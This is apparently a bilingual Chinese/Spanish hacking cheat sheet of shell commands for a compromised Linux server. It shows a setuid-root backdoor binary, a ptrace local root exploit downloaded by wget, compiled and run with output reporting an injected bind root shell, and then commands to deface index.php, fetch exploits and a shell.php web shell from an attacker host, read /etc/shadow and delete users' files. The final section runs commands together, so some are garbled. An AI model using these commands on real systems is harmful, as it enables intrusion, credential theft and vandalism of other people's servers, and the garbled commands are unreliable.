[cnbird@localhost tmp]#id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk)
[cnbird@localhost tmp]#cp `which id ` .
[cnbird@localhost tmp]#chown root ./id
[cnbird@localhost tmp]#chmod 755 ./id ; chmod u+s ./id
[cnbird@localhost tmp]#ls -l ./id
-rwsr-xr-x 1 root root 9264 Mar 8 21:36 ./id*
[cnbird@localhost tmp]#exit
[cnbird@localhost tmp]$id
uid=500(cnbird) gid=500(cnbird) groups=500(cnbird)
[cnbird@localhost tmp]$./id
uid=500(cnbird) gid=500(cnbird) euid=0(root) groups=500(cnbird)
2.利用ptrace成为root的方法
[bash]# cd /tmp/; wget http://delivered.informaticahispana.org/ptrace.c; gcc ptrace.c -o ptrace; chmod -c 777 ptrace; ./ptrace
- Parent's PID is 2313. Child's PID is 2314.
- Attaching to 2315...
- Got the thread!!
- Waiting for the next signal...
- Injecting shellcode at 0x4000e85d
- Bind root shell on port 24876... =p
- Detached from modprobe thread.
- Committing suicide.....
[bash]# id
uid=0(root) gid=0(root) groups=0(root)
Para ver los dominios que hay en el server:
---------------------------------------------------------
cat /etc/httpd/conf/httpd.conf|grep ServerName
cat /etc/httpd/conf/httpd.conf
cat /etc/localdomains
cat /etc/trueuserdomains
cat /etc/userdomains
---------------------------------------------------------
Para ver la version de kernel:
---------------------------------------------------------
uname -a
---------------------------------------------------------
Para modificar un index ya existente:
---------------------------------------------------------
echo "RootBox was OwNz You"index.php
---------------------------------------------------------
Para subir, compilar, darle permisos de ejecucion y ejecutar un exploit:
---------------------------------------------------------
cd /tmp/;wget http://web_atacante/exploit.c cd /tmp/;cc exploit.c -o exploit_compiladocd /tmp/;chmod -c 777 exploit_compiladocd /tmp/;./exploit_compiladoHasta aqui termina el proceso para un exploit.---------------------------------------------------------Ver las contrase?as encriptadas de todos los usuarios:---------------------------------------------------------cat /etc/shadow---------------------------------------------------------Borrar un Fichero:---------------------------------------------------------cd /home/juan/public_html/;rm import.htm---------------------------------------------------------Subir un fichero:---------------------------------------------------------cd /home/juan/public_html/;wget http://web_atacante/shell.php